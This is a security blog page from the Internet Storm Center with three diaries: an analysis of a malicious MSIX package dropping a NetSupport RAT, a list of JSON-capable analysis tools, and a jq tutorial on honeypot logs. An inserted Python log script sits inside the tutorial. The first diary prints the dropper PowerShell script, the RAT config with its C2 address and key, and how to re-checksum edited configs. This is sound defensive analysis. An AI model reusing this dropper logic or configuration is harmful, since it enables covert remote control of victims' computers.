
INTERNET STORM CENTER



DIARIES




Published: 2024-06-17 by Xavier Mertens


NEW NETSUPPORT CAMPAIGN DELIVERED THROUGH MSIX PACKAGES

It's amazing to see how attackers reuse and combine known techniques to target
their victims with new campaigns! Last week, I spotted some malicious MSIX
packages on VT that drop a NetSupport[1] client preconfigured to phone home to
an attacker-controlled manager. Remote support tools are really "cool" for
attackers because they provide a perfect way to communicate with infected
computers without the need to develop their own C2 infrastructure and protocol!
While some of them are popular and often searched for as evidence of compromise
(like AnyDesk or TeamViewer), others, like NetSupport, tend to remain below the
radar. This one is available for free for 30 days (more than enough to launch a
campaign) and provides all the expected features to interact with victims:



Let's have a look at one example of a malicious MSIX
file: update_12_06_2024_5903695.msix
(SHA256:e77bd0bf2c2f5f0094126f34de49ea5d4304a094121307603916ae3c50dfcfe4). The
file has a very low detection score (4/69)[2]. The file contains all the
components to download and install the NetSupport client:

# zipdump.py update_12_06_2024_5903695.msix 
Index Filename                                            Encrypted Timestamp           
    1 Registry.dat                                                0 2024-06-12 08:10:20 
    2 User.dat                                                    0 2024-06-12 08:10:20 
    3 Assets/logo.png                                             0 2024-06-12 08:10:20 
    4 config.json                                                 0 2024-06-12 08:10:20 
    5 fix.ps1                                                     0 2024-06-12 08:10:20 
    6 PsfLauncher32.exe                                           0 2024-06-12 08:10:20 
    7 PsfLauncher64.exe                                           0 2024-06-12 08:10:20 
    8 PsfRunDll32.exe                                             0 2024-06-12 08:10:20 
    9 PsfRunDll64.exe                                             0 2024-06-12 08:10:20 
   10 PsfRuntime32.dll                                            0 2024-06-12 08:10:20 
   11 PsfRuntime64.dll                                            0 2024-06-12 08:10:20 
   12 Resources.pri                                               0 2024-06-12 08:10:20 
   13 StartingScriptWrapper.ps1                                   0 2024-06-12 08:10:20 
   14 VFS/ProgramFilesX64/7z2404-extra/7za.dll                    0 2024-06-12 08:10:20 
   15 VFS/ProgramFilesX64/7z2404-extra/7za.exe                    0 2024-06-12 08:10:20 
   16 VFS/ProgramFilesX64/7z2404-extra/7zxa.dll                   0 2024-06-12 08:10:20 
   17 VFS/ProgramFilesX64/7z2404-extra/arm64/7-ZipFar.dll         0 2024-06-12 08:10:20 
   18 VFS/ProgramFilesX64/7z2404-extra/arm64/7za.dll              0 2024-06-12 08:10:20 
   19 VFS/ProgramFilesX64/7z2404-extra/arm64/7za.exe              0 2024-06-12 08:10:20 
   20 VFS/ProgramFilesX64/7z2404-extra/arm64/7zxa.dll             0 2024-06-12 08:10:20 
   21 VFS/ProgramFilesX64/7z2404-extra/Far/7-ZipEng.hlf           0 2024-06-12 08:10:20 
   22 VFS/ProgramFilesX64/7z2404-extra/Far/7-ZipEng.lng           0 2024-06-12 08:10:20 
   23 VFS/ProgramFilesX64/7z2404-extra/Far/7-ZipFar.dll           0 2024-06-12 08:10:20 
   24 VFS/ProgramFilesX64/7z2404-extra/Far/7-ZipFar64.dll         0 2024-06-12 08:10:20 
   25 VFS/ProgramFilesX64/7z2404-extra/Far/7-ZipRus.hlf           0 2024-06-12 08:10:20 
   26 VFS/ProgramFilesX64/7z2404-extra/Far/7-ZipRus.lng           0 2024-06-12 08:10:20 
   27 VFS/ProgramFilesX64/7z2404-extra/Far/7zToFar.ini            0 2024-06-12 08:10:20 
   28 VFS/ProgramFilesX64/7z2404-extra/Far/far7z.reg              0 2024-06-12 08:10:20 
   29 VFS/ProgramFilesX64/7z2404-extra/Far/far7z.txt              0 2024-06-12 08:10:20 
   30 VFS/ProgramFilesX64/7z2404-extra/history.txt                0 2024-06-12 08:10:20 
   31 VFS/ProgramFilesX64/7z2404-extra/License.txt                0 2024-06-12 08:10:20 
   32 VFS/ProgramFilesX64/7z2404-extra/readme.txt                 0 2024-06-12 08:10:20 
   33 VFS/ProgramFilesX64/7z2404-extra/x64/7za.dll                0 2024-06-12 08:10:20 
   34 VFS/ProgramFilesX64/7z2404-extra/x64/7za.exe                0 2024-06-12 08:10:20 
   35 VFS/ProgramFilesX64/7z2404-extra/x64/7zxa.dll               0 2024-06-12 08:10:20 
   36 VFS/ProgramFilesX64/client2.7z                              0 2024-06-12 08:10:20 
   37 VFS/ProgramFilesX64/PsfRunDll64.exe                         0 2024-06-12 08:10:20 
   38 AppxManifest.xml                                            0 2024-06-12 08:10:20 
   39 AppxBlockMap.xml                                            0 2024-06-12 08:10:20 
   40 [Content_Types].xml                                         0 2024-06-12 08:10:20 
   41 AppxMetadata/CodeIntegrity.cat                              0 2024-06-12 08:10:20 
   42 AppxSignature.p7x                                           0 2024-06-12 08:10:48 


You can see that a portable 7zip version is included in the file. It will be
used to unpack the NetSupport client stored in the client2.7z file. Everything
will happen in fix.ps1:

# zipdump.py update_12_06_2024_5903695.msix -s 5 -d
$url = "https://www.google.com/intl/en_en/chrome/"
Start-Process $url

$domain = Get-WmiObject Win32_ComputerSystem | Select-Object -ExpandProperty Domain

if ($domain -eq "WORKGROUP") {
} else {
    cmd /c "VFS\ProgramFilesX64\7z2404-extra\7za.exe e VFS\ProgramFilesX64\client2.7z -oC:\Users\Public\Documents\Client -p88888888"
    cmd /c "VFS\ProgramFilesX64\7z2404-extra\7za.exe e C:\Users\Public\Documents\Client\client1.7z -oC:\Users\Public\Documents\Client -p88888888"
    $path = "C:\Users\Public\Documents\Client\client32.exe"
    Start-Process $path
}

First, the script opens a browser on the Chrome download page to deceive the
victim. Then, it checks whether the computer is joined to a Microsoft (Active
Directory) domain (read: a corporate computer). If not, the client is not
installed.

The NetSupport client is double-compressed in client2.7z then client1.7z:

# 7z l client1.7z 

7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,2 CPUs Intel(R) Core(TM) i9-9980HK CPU @ 2.40GHz (906ED),ASM,AES-NI)

Scanning the drive for archives:
1 file, 1510337 bytes (1475 KiB)

Listing archive: client1.7z

--
Path = client1.7z
Type = 7z
Physical Size = 1510337
Headers Size = 545
Method = LZMA2:6m BCJ 7zAES
Solid = +
Blocks = 2

   Date      Time    Attr         Size   Compressed  Name
------------------- ----- ------------ ------------  ------------------------
2024-06-12 10:47:36 D....            0            0  client
2024-06-12 08:07:49 ....A          652          960  client/client32.ini
2007-07-06 13:07:32 ....A          328               client/nskbfltr.inf
2024-06-12 10:49:40 ....A         1369               client/NSM.LIC
2010-04-27 05:26:38 ....A           46               client/nsm_vpro.ini
2016-12-07 00:03:12 ....A        93560      1508832  client/AudioCapture.dll
2024-06-12 10:48:13 ....A        55459               client/client32.exe
2016-04-26 20:55:34 ....A       328056               client/HTCTL32.DLL
2015-04-24 17:27:28 ....A       773968               client/msvcr100.dll
2016-04-26 20:59:04 ....A        33144               client/pcicapi.dll
2016-04-26 20:59:10 ....A        18808               client/PCICHEK.DLL
2023-06-11 18:51:36 ....A      3710280               client/PCICL32.DLL
2023-06-13 13:01:09 ....A        63320               client/remcmdstub.exe
2023-06-13 13:35:38 ....A       391832               client/TCCTL32.DLL
------------------- ----- ------------ ------------  ------------------------
2024-06-12 10:49:40            5470822      1509792  13 files, 1 folders


The client32.ini discloses the IP address of the NetSupport Manager (the C2):

# cat client/client32.ini 
0x1c42f29c

[Client]
_present=1
AlwaysOnTop=0
AutoICFConfig=1
DisableChat=1
DisableChatMenu=1
DisableDisconnect=1
DisableMessage=1
DisableReplayMenu=1
DisableRequestHelp=1
Protocols=3
Shared=1
silent=1
SKMode=1
SOS_Alt=0
SOS_LShift=0
SOS_RShift=0
SysTray=0
UnloadMirrorOnDisconnect=0
Usernames=*
ValidAddresses.TCP=*

[_Info]
Filename=C:\Users\Public\Pictures\client32u.ini

[_License]
quiet=1

[Audio]
DisableAudioFilter=1

[General]
BeepUsingSpeaker=0

[HTTP]
CMPI=60
GatewayAddress=38[.]135[.]52[.]140:443
GSK=GK;OAKDA9C<I?PBGFF9F>D@KHF:J<P
SecondaryGateway=
SecondaryPort=443

[TCPIP]
MulticastListenAddress=


The C2 server (down at this time) is 38[.]135[.]52[.]140 and uses HTTPS. GSK is
the shared key used to encrypt communications.

Note the first line (the hex value): it is a checksum of the configuration file.
Any change in the file will make it unusable. But NetSupport provides a handy
support tool called cksini.exe that generates the checksum for a manually
edited configuration file:

C:\Temp>cksini
Generate checksum for .INI file
Checksum is: 0xfbaa0e3e
Output is in file: client32.ini

Malicious MSIX files are not new[3], and NetSupport has already been heavily
used by attackers in the past[4], but together they remain a very good
combination to compromise more victims... at a very low cost for attackers!

[1] https://www.netsupportmanager.com
[2] https://www.virustotal.com/gui/file/e77bd0bf2c2f5f0094126f34de49ea5d4304a094121307603916ae3c50dfcfe4
[3] https://isc.sans.edu/diary/Redline+Dropped+Through+MSIX+Package/30404
[4] https://isc.sans.edu/diary/sczriptzzbn+inject+pushes+malware+for+NetSupport+RAT/29170

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

Published: 2024-06-15 by Didier Stevens


OVERVIEW OF MY TOOLS THAT HANDLE JSON DATA

I wrote a couple of diary entries showing my tools that produce and consume JSON
data. Like "Analyzing PDF Streams", "Another PDF Streams Example: Extracting
JPEGs" and "Analyzing MSG Files".

The tools that can produce MyJSON output (option --jsonoutput) to stdout are:

 * base64dump.py
 * cut-bytes.py
 * emldump.py
 * file-magic.py
 * myjson-transform.py
 * oledump.py
 * pdf-parser.py
 * rtfdump.py
 * zipdump.py

The tools that can accept MyJSON input (option --jsoninput) from stdin are:

 * 1768.py
 * amsiscan.py
 * base64dump.py
 * file-magic.py
 * format-bytes.py
 * hash.py
 * isodump.py
 * onedump.py
 * pdftool.py
 * pngdump.py
 * search-for-compression.py
 * strings.py
 * xmldump.py

The tools that only accept MyJSON input from stdin are:

 * myjson-transform.py
 * myjson-filter.py

And if you want to write your own program that can process MyJSON data, my
Python program template for binary files process-binary-files.py also supports
this format.

Didier Stevens
Senior handler
blog.DidierStevens.com

Published: 2024-06-13 by Guy Bruneau


THE ART OF JQ AND COMMAND-LINE FU [GUEST DIARY]

[This is a Guest Diary by Kaela Reed, an ISC intern as part of the SANS.edu BACS
program]

Viewing logs from a command-line can make it difficult to extract meaningful
data if you’re unfamiliar with the utilities. While there is a learning curve to
working with command-line utilities to sort through logs, they are efficient,
flexible, and easy to incorporate into scripts. Using tools like jq, cut, sort,
and wc, we can extract details from logs to gather statistics and help us build
context from attacks.

What is JSON?

JavaScript Object Notation (JSON) is a lightweight, structured data-interchange
format [1]. JSON is a common format for logs and APIs because it’s easy for
machines to parse. The simple structure also makes it easy for humans to read,
especially when used in conjunction with a utility called jq (JSON Query),
which we will revisit after we cover the basics of JSON.

Objects

JSON uses curly braces to hold “objects,” which contain unordered key/value
pairs [2]. A key is separated from its value by a colon, and key/value pairs
are separated from each other by commas. You might recognize this format if
you’ve ever decoded a JWT (JSON Web Token):
{
  "alg": "HS256",
  "typ": "JWT"
}

Arrays

JSON also uses ordered lists called “arrays” which can be contained within
objects:
{
  "method": "POST",
  "url": "/aws/credentials",
  "useragent": [
    "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
  ]
}

JQ to the Rescue

The jq tool is a free, open-source JSON processor written in portable C with no
runtime dependencies. It’s easy to parse and filter JSON logs with jq, and it’s
already packaged in the major Linux distributions, but you can also download it
[3].

Extracting Data from Logs

If we read a JSON file using the cat utility in Linux, it can be difficult to
sort through the information:



This is where jq comes in handy! Using jq, we can interact with the data from
JSON logs in a meaningful way. 
To read a JSON log with jq, we can either cat the file and pipe it through jq,
or use the command:
jq . <filename>



Using jq with JSON logs makes it easier for the reader to sort through the data.
However, simply printing the log to the screen isn’t enough to extract
meaningful information when you’re dealing with large log files and thousands or
more records to sort through.

Finding Keys

Recall that JSON consists of key/value pairs. We can list all the keys in a JSON
file to help us extract specific information later:
cat logs/web/webhoneypot-2024-04-20.json | jq 'keys'



Source IPs

There’s a key named “sip” which stores source IP addresses. We can filter data
by using dot notation with .<field name> [4]. To extract the source IPs from the
JSON file, we can use .sip. Let’s look at all the source IPs in the log file by
using jq, then pipe it to sort and remove the quotation marks in the output:
cat honeypot/logs/web/webhoneypot-2024-04-20.json | jq '.sip' | sort -u | tr -d "\""

Even better, we could use jq -r for raw output instead of using the tr utility
to get rid of the quotation marks.
cat honeypot/logs/web/webhoneypot-2024-04-20.json | jq -r '.sip' | sort -u

Piping the previous command to wc -l, we can count how many lines there are,
which will also tell us how many source IP addresses we have:
cat honeypot/logs/web/webhoneypot-2024-04-20.json | jq -r '.sip' | sort -u | wc -l



Extracting URIs

URIs are stored in the field name "url." The following command will print every
URI in the log on separate lines:
cat logs/web/webhoneypot-2024-04-20.json | jq '.url'

Piping the previous command to wc -l, we can count the number of URIs, which is
105,218. That’s a lot! 



However, if we pipe the jq command to sort, we will see there are duplicate
values. Many of the same URIs were visited multiple times and from multiple IP
addresses.



To extract a list of unique URIs and get rid of the duplicates, we can follow
the same method as in the last example, but pipe the output through sort -u (or
sort and uniq).



We have 510 unique URIs visited!

Extracting Multiple Elements

We can also extract multiple elements and separate them into objects:
cat logs/web/webhoneypot-2024-04-20.json | jq 'select(.sip == "75.101.186.148") | {time, sip, url}' > dirb-attack.json



Alternative Ways with Arrays

Why did the programmer quit his job?

Because he didn’t get arrays!

Using jq, we can convert fields into different data types. In the last example,
we extracted multiple elements and placed them into objects. We could also
extract multiple elements and convert them to arrays:
cat honeypot/logs/web/webhoneypot-2024-04-20.json | jq 'select(.sip == "75.101.186.148") | [.time, .sip, .url]'



With arrays, we can access the data with an index number. If we want to look at
the 3rd element, which consists of URIs, we can reference the index value. With
indexing, the first element starts at 0, so if we want to look at the 3rd
element, we need to use an index of 2. We can then pipe that to sort -u to sort
unique URIs alphabetically:

cat honeypot/logs/web/webhoneypot-2024-04-20.json | jq 'select(.sip == "75.101.186.148") | [.time, .sip, .url]' | jq -r .[2] | sort -u



We can also grab only the URIs, join each one with a new line, sort and count
how many unique URIs there are:
cat honeypot/logs/web/webhoneypot-2024-04-20.json | jq -r 'select(.sip == "75.101.186.148") | [.url] | join("\n")' | sort -u | wc -l



Converting to CSV Format

We can take different fields from JSON and convert that data into a CSV format
[5]. Let’s take the "time", "sip" and "url" fields, then convert the data to a
CSV and open it in a spreadsheet editor.
cat honeypot/logs/web/webhoneypot-2024-04-20.json | jq -r 'select(.sip == "75.101.186.148") | [.time,.sip,.url] | @csv' > attack.csv



What is Directory Busting?

In the following example, we’re going to extract useful information from a
directory busting attack that came from one specific IP address, but first, what
is directory busting?

Directory Busting (Forced Browsing) is a technique used to discover hidden
webpages and files on a webserver [6]. This can be done manually by sending HTTP
requests to the server requesting common page names and files, however, this is
often performed with automated tools and scripts. Automation allows for hundreds
or thousands of requests to different URIs in a short period of time. The goal
of this kind of attack is to discover sensitive information, map the attack
surface, and identify interesting pages (like administrative login pages) that
could contain vulnerabilities.

Finding How Many Unique URIs an Attacker Probed

Let’s first look at all entries from the attacker’s IP and send the output to a
separate JSON file:

cat webhoneypot-2024-04-20.json | jq 'select(.sip == "75.101.186.148")' > ip_75.101.186.148.json

If we want to make sure this worked, we can list all the source IPs in the new
file we created to make sure the logs are only from the attacker IP address
75.101.186.148:
cat ip_75.101.186.148.json | jq -r '.sip' | sort -u



Perfect! The new file only contains logs from the source IP of 75.101.186.148.
If we use the wc utility, we see there are 104,196 entries from that one IP!



Looking at the time stamps, these attacks occurred in a very short amount of
time (roughly 5 minutes). This is typical in an automated attack like directory
busting.
Let’s pipe the URIs through sort, then count how many different URIs were probed
by this attacker:
cat ip_75.101.186.148.json | jq '.url' | sort -u | wc -l



The attacker IP 75.101.186.148 probed 452 unique URIs on the webserver. Looking
at the Internet Storm Center’s Report on the attacker IP, that is an accurate
number [7]. Although directory busting attacks can be accomplished with
brute-force techniques, these are usually accomplished as dictionary attacks.
The threat actor has been reported multiple times and has probed the same number
of unique URLs each time, so the attacker is likely using the same wordlist to
perform the directory busting attack:



The previous commands in the directory busting scenario were run separately, but
could have been performed with one command to achieve the same result:
cat honeypot/logs/web/webhoneypot-2024-04-20.json | jq 'select(.sip == "75.101.186.148") | (.url)' | sort -u | wc -l
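The jq pipelines above as a stand-alone Python script, added here as an example and not part of the guest diary: it computes the same per-IP statistics (unique source IPs, unique URIs, time span), flags bursts of distinct URIs that look like directory busting, and writes the @csv equivalent. The sample records, field names, timestamp format and thresholds are constructed assumptions.

```python
"""Per-source-IP statistics from a webhoneypot JSON log: the jq pipelines above in Python."""
import csv
import io
import json
from collections import defaultdict
from datetime import datetime

# Constructed sample log, one JSON object per line in the webhoneypot layout used above
# (field names and timestamp format are assumptions). 203.0.113.7 probes many distinct
# URIs within seconds; 198.51.100.2 sends two ordinary requests two hours apart.
PROBED = ["admin", "backup", ".git/config", "phpmyadmin", "wp-login.php", ".env",
          "config.php", "admin"]
SAMPLE_LOG = "\n".join(
    [json.dumps({"time": f"2024-04-20T10:15:{i:02d}", "sip": "203.0.113.7",
                 "url": f"/{p}", "method": "GET"}) for i, p in enumerate(PROBED)]
    + [json.dumps({"time": "2024-04-20T11:00:00", "sip": "198.51.100.2", "url": "/"}),
       json.dumps({"time": "2024-04-20T13:00:00", "sip": "198.51.100.2", "url": "/index.html"})]
) + "\n"

def parse_log(text: str) -> list:
    """Parse newline-delimited JSON, skipping blank or malformed lines."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            records.append(json.loads(line))
        except json.JSONDecodeError:
            continue  # a truncated line should not abort the whole analysis
    return records

def per_ip_stats(records: list) -> dict:
    """Per source IP: request count, unique URIs and time span (the `.sip`/`.url` | sort -u | wc -l steps)."""
    acc = defaultdict(lambda: {"requests": 0, "urls": set(), "first": None, "last": None})
    for r in records:
        s = acc[r["sip"]]
        t = datetime.fromisoformat(r["time"])
        s["requests"] += 1
        s["urls"].add(r["url"])
        s["first"] = t if s["first"] is None else min(s["first"], t)
        s["last"] = t if s["last"] is None else max(s["last"], t)
    return {ip: {"requests": s["requests"], "unique_urls": len(s["urls"]),
                 "seconds": (s["last"] - s["first"]).total_seconds()} for ip, s in acc.items()}

def directory_busters(stats: dict, min_unique: int = 5, max_seconds: float = 300.0) -> list:
    """IPs that probed many distinct URIs in a short window (thresholds are assumptions)."""
    return sorted(ip for ip, s in stats.items()
                  if s["unique_urls"] >= min_unique and s["seconds"] <= max_seconds)

def to_csv(records: list, sip: str) -> str:
    """Same output as `jq -r 'select(.sip == SIP) | [.time,.sip,.url] | @csv'`."""
    out = io.StringIO()
    writer = csv.writer(out, quoting=csv.QUOTE_ALL, lineterminator="\n")
    for r in records:
        if r["sip"] == sip:
            writer.writerow([r["time"], r["sip"], r["url"]])
    return out.getvalue()

if __name__ == "__main__":
    recs = parse_log(SAMPLE_LOG)
    stats = per_ip_stats(recs)
    print(stats)
    print("likely directory busting:", directory_busters(stats))
    print(to_csv(recs, "203.0.113.7"), end="")
```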



Conclusion

These examples weren’t the only ways we could’ve arrived at the same outcome.
This is the wonderful thing about using command-line fu! There isn’t just ONE
way to reach the same answer, and that’s part of what can make log analysis
within the command-line fun! We’ve merely scratched the surface with jq, but
there is a website where you can paste JSON data and practice with jq, called
JQ Play [8].

Keep practicing the art of command-line fu, grasshopper!

Cheat Sheet



[1] JSON.org. “Introducing JSON.” Json.org, www.json.org/json-en.html. Accessed
28 May 2024.
[2] w3schools. “JSON Syntax.” W3schools.com, 2019,
www.w3schools.com/js/js_json_syntax.asp. Accessed 28 May 2024.
[3] jqlang. “Download jq.” jqlang.github.io,
https://jqlang.github.io/jq/download. Accessed 28 May 2024.
[4] “How to Use JQ to Process JSON on the Command Line.” Linode Guides &
Tutorials, 5 Nov. 2021,
www.linode.com/docs/guides/using-jq-to-process-json-on-the-command-line/.
Accessed 28 May 2024.
[5] Ramanujam, Sriram. “How to Convert JSON to CSV in Linux.” Baeldung, 13 Dec.
2023, www.baeldung.com/linux/json-csv. Accessed 28 May 2024.
[6] OWASP. “Forced Browsing.” Owasp.org,
owasp.org/www-community/attacks/Forced_browsing. Accessed 28 May 2024.
[7] Internet Storm Center. “IP Info: 75.101.186.148.” SANS Internet Storm
Center, https://isc.sans.edu/ipinfo/75.101.186.148. Accessed 28 May 2024.
[8] jqplay. “Jq Play.” Jqplay.org, jqplay.org. Accessed 28 May 2024.
[9] SANS Technology Institute. “Bachelor’s Degree in Applied Cybersecurity.”
https://www.sans.edu/cyber-security-programs/bachelors-degree/
-----------
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu
